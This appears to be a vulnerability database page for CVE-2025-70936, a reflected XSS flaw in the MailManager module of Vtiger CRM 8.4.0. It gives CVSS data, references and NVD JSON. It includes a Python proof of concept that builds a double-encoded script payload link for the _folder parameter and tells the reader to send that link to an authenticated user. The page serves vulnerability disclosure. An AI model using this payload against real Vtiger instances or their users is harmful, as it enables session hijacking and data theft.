CVE-2025-70936

Description

Vtiger CRM 8.4.0 contains a reflected cross-site scripting (XSS) vulnerability in the MailManager module. Improper handling of user-controlled input in the _folder parameter allows a specially crafted, double URL-encoded payload to be reflected and executed in the context of an authenticated user s session.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Vtiger CRM 8.4.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2025-70936
# Reflected XSS in Vtiger CRM MailManager module via _folder parameter
# Requires double URL encoding

import urllib.parse

# Malicious payload (JavaScript)
payload = "<script>alert(document.cookie)</script>"

# Step 1: First URL encode
encoded_once = urllib.parse.quote(payload)
# Step 2: Second URL encode (required for this vulnerability)
encoded_twice = urllib.parse.quote(encoded_once)

# Target URL structure (replace with actual host)
target_host = "http://target-vtiger-site.com"
vulnerable_path = "/index.php"
params = {
    "module": "MailManager",
    "view": "Index",
    "_folder": encoded_twice
}

# Generate full PoC URL
poc_url = f"{target_host}{vulnerable_path}?" + urllib.parse.urlencode(params)

print(f"Payload: {payload}")
print(f"Double Encoded Payload: {encoded_twice}")
print(f"\nPoC Link:\n{poc_url}")
print("\nSend this link to an authenticated user to trigger the XSS.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-70936
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-70936
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-70936/
[4] VulDB https://vuldb.com/cve/CVE-2025-70936
[5] https://www.simonjuguna.com/cve-2025-70936-reflected-xss-vulnerability-in-vtiger-crm-v8-4-0/
[6] https://www.vtiger.com/open-source-crm/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-70936", "sourceIdentifier": "[email protected]", "published": "2026-04-13T21:16:23.793", "lastModified": "2026-04-17T15:33:34.050", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vtiger CRM 8.4.0 contains a reflected cross-site scripting (XSS) vulnerability in the MailManager module. Improper handling of user-controlled input in the _folder parameter allows a specially crafted, double URL-encoded payload to be reflected and executed in the context of an authenticated user s session."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://www.simonjuguna.com/cve-2025-70936-reflected-xss-vulnerability-in-vtiger-crm-v8-4-0/", "source": "[email protected]"}, {"url": "https://www.vtiger.com/open-source-crm/", "source": "[email protected]"}]}}